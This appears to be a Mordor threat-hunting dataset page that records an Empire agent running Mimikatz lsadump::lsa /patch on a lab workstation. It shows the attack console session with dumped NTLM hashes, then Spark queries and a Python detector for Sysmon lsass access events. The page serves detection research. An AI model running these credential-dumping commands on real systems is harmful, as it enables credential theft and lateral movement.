Empire Mimikatz Lsadump LSA Patch

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/05/18

Modification Date

2020/09/20

Tactics

['TA0006']

Techniques

['T1003.001']

Tags

['LSASS Memory Credentials Read']

Dataset Description

This dataset captures an adversary reading credential material from the memory of lsass.exe. One popular tool performing this behavior is Mimikatz; here its lsadump::lsa /patch command is run through an Empire agent on WORKSTATION5 and dumps the NTLM hashes of the local accounts shown in the adversary view below.

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author | Name | Link
Threat Hunter Playbook | LSASS Access from Non System Account | https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-170105221010.html

Simulation Plan

Environment | Tool Type | Module
Mordor shire | C2 | lsadump

Adversary View

(Empire: B7Y8G4XC) > usemodule credentials/mimikatz/lsadump*
(Empire: powershell/credentials/mimikatz/lsadump) > info

              Name: Invoke-Mimikatz LSA Dump
            Module: powershell/credentials/mimikatz/lsadump
        NeedsAdmin: True
        OpsecSafe: True
          Language: powershell
MinLanguageVersion: 2
        Background: True
  OutputExtension: None

Authors:
  @JosephBialek
  @gentilkiwi

Description:
  Runs PowerSploit's Invoke-Mimikatz function to extract a
  particular user hash from memory. Useful on domain
  controllers.

Comments:
  http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com htt
  ps://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#ls
  a

Options:

  Name     Required    Value                     Description
  ----     --------    -------                   -----------
  Agent    True        B7Y8G4XC                  Agent to run module on.                 
  Username False                                 Username to extract the hash for, blank 
                                                for all local passwords.                

(Empire: powershell/credentials/mimikatz/lsadump) > execute
[*] Tasked B7Y8G4XC to run TASK_CMD_JOB
[*] Agent B7Y8G4XC tasked with task ID 2
[*] Tasked agent B7Y8G4XC to run module powershell/credentials/mimikatz/lsadump
(Empire: powershell/credentials/mimikatz/lsadump) > 
Job started: VGHXZ5

Hostname: WORKSTATION5.theshire.local / S-1-5-21-1363495622-3806888128-621328882

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug  4 2020 20:16:54
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ##       > http://blog.gentilkiwi.com/mimikatz
'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(powershell) # lsadump::lsa /patch
Domain : WORKSTATION5 / S-1-5-21-1549354820-3669603161-4025758380

RID  : 000001f7 (503)
User : DefaultAccount
LM   : 
NTLM : 

RID  : 000001f5 (501)
User : Guest
LM   : 
NTLM : 

RID  : 000001f4 (500)
User : wardog
LM   : 
NTLM : 42ddb2963bbe8f1c075fc869d3bce33e

RID  : 000001f8 (504)
User : WDAGUtilityAccount
LM   : 
NTLM : 45a313f1860be24e967e55b94649aa31

(Empire: powershell/credentials/mimikatz/lsadump) >

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *   # OTRF helpers used below: get_spark(), registerMordorSQLTable()
spark = get_spark()                  # SparkSession the SQL queries below run against

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/empire_mimikatz_lsadump_patch.zip"
# Downloads the zip, loads its JSON lines into a DataFrame and exposes it as the SQL view "mordorTable"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

# Event volume per host, channel and EventID: a first look at which log sources
# (Security, Sysmon, PowerShell) the dataset contains and where the bulk of it sits
df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Windows PowerShell                      |800    |2859 |
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |2505 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |279  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |162  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |150  |
|WORKSTATION5.theshire.local|Security                                |5156   |79   |
|MORDORDC.theshire.local    |Security                                |4658   |64   |
|MORDORDC.theshire.local    |Security                                |5158   |61   |
|MORDORDC.theshire.local    |Security                                |5156   |55   |
|WORKSTATION5.theshire.local|Security                                |5158   |48   |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |48   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |3      |38   |
|WORKSTATION6.theshire.local|Security                                |5156   |38   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |37   |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational    |3      |36   |
|WORKSTATION6.theshire.local|Security                                |4703   |32   |
|MORDORDC.theshire.local    |Security                                |4656   |32   |
|MORDORDC.theshire.local    |Security                                |4663   |32   |
|MORDORDC.theshire.local    |Security                                |4690   |32   |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational    |10     |30   |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows
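Of the log sources in the table above, Sysmon EventID 10 (ProcessAccess) on WORKSTATION5 is the channel in which another process opening a handle to lsass.exe is recorded, together with the access mask it was granted. The Python below is an added example, not code from the mordor project or from the notebook linked above: it decodes the Sysmon GrantedAccess value into named Windows process rights and reports EventID 10 records that open lsass.exe with read or write access to its memory, distinguishing masks that allow writing (what an in-memory patch such as lsadump::lsa /patch needs) from read-only ones. The five JSON lines are constructed for illustration; the field names follow Sysmon's schema and the flattened one-event-per-line layout the mordor files use, but that layout, the 0x1438 mask in the first record (a commonly reported Mimikatz value, not one shown on this page) and the benign_sources allowlist parameter are assumptions of the example.

```python
import json

# Process access rights from winnt.h; Sysmon reports the granted mask in
# EventID 10 (ProcessAccess) as a hex string in the GrantedAccess field.
PROCESS_ACCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
SYSMON_CHANNEL = "Microsoft-Windows-Sysmon/Operational"


def decode_granted_access(granted_access):
    """Map a Sysmon GrantedAccess value such as '0x1438' to the set of named rights."""
    mask = int(granted_access, 16)
    return {name for bit, name in PROCESS_ACCESS_RIGHTS.items() if mask & bit}


def find_lsass_access(json_lines, benign_sources=()):
    """Return Sysmon EventID 10 records that open lsass.exe with memory read or write.

    benign_sources is a hypothetical, caller-supplied allowlist of SourceImage paths
    (compared case-insensitively) for processes that legitimately touch lsass.
    """
    benign = {path.lower() for path in benign_sources}
    hits = []
    for line in json_lines:
        ev = json.loads(line)  # assumes one flattened event per line, EventID as an integer
        if ev.get("Channel") != SYSMON_CHANNEL or ev.get("EventID") != 10:
            continue
        if not ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
            continue
        mask = int(ev["GrantedAccess"], 16)
        if not mask & (PROCESS_VM_READ | PROCESS_VM_WRITE):
            continue  # e.g. QUERY_LIMITED_INFORMATION only: cannot read credential material
        source = ev.get("SourceImage", "")
        if source.lower() in benign:
            continue
        hits.append({
            "Hostname": ev.get("Hostname"),
            "SourceImage": source,
            "GrantedAccess": ev["GrantedAccess"],
            "rights": sorted(decode_granted_access(ev["GrantedAccess"])),
            # An in-memory patch such as lsadump::lsa /patch needs write access;
            # a plain read of credential material only needs PROCESS_VM_READ.
            "writes_memory": bool(mask & PROCESS_VM_WRITE),
        })
    return hits


# Constructed sample records (not lines from the real dataset), in the flattened
# JSON-lines shape the mordor files use: one Sysmon event per line.
SAMPLE_EVENTS = [
    # The Empire agent's powershell.exe opening lsass with 0x1438 (illustrative mask).
    r'{"Hostname":"WORKSTATION5.theshire.local","Channel":"Microsoft-Windows-Sysmon/Operational",'
    r'"EventID":10,"SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",'
    r'"TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1438"}',
    # A service host that only queries limited information: no memory access.
    r'{"Hostname":"WORKSTATION5.theshire.local","Channel":"Microsoft-Windows-Sysmon/Operational",'
    r'"EventID":10,"SourceImage":"C:\\Windows\\system32\\svchost.exe",'
    r'"TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1000"}',
    # An AV engine with full access: suspicious by mask alone, so allowlist it by path.
    r'{"Hostname":"WORKSTATION5.theshire.local","Channel":"Microsoft-Windows-Sysmon/Operational",'
    r'"EventID":10,"SourceImage":"C:\\Program Files\\Windows Defender\\MsMpEng.exe",'
    r'"TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1fffff"}',
    # Memory read of a different target process: not in scope.
    r'{"Hostname":"WORKSTATION5.theshire.local","Channel":"Microsoft-Windows-Sysmon/Operational",'
    r'"EventID":10,"SourceImage":"C:\\Windows\\system32\\taskmgr.exe",'
    r'"TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410"}',
    # A different Sysmon event type on the same channel, skipped by the EventID filter.
    r'{"Hostname":"WORKSTATION5.theshire.local","Channel":"Microsoft-Windows-Sysmon/Operational",'
    r'"EventID":7,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",'
    r'"ImageLoaded":"C:\\Windows\\System32\\samlib.dll"}',
]

if __name__ == "__main__":
    allowlist = {r"C:\Program Files\Windows Defender\MsMpEng.exe"}  # hypothetical allowlist entry
    for hit in find_lsass_access(SAMPLE_EVENTS, benign_sources=allowlist):
        print(hit["Hostname"], hit["SourceImage"], hit["GrantedAccess"],
              "patch-capable" if hit["writes_memory"] else "read-only", hit["rights"])
```

Run against the real dataset, the same function can be fed the JSON lines from the zip instead of SAMPLE_EVENTS; the allowlist is the part that has to be tuned per environment, since security products routinely open lsass with broad rights and will otherwise dominate the results.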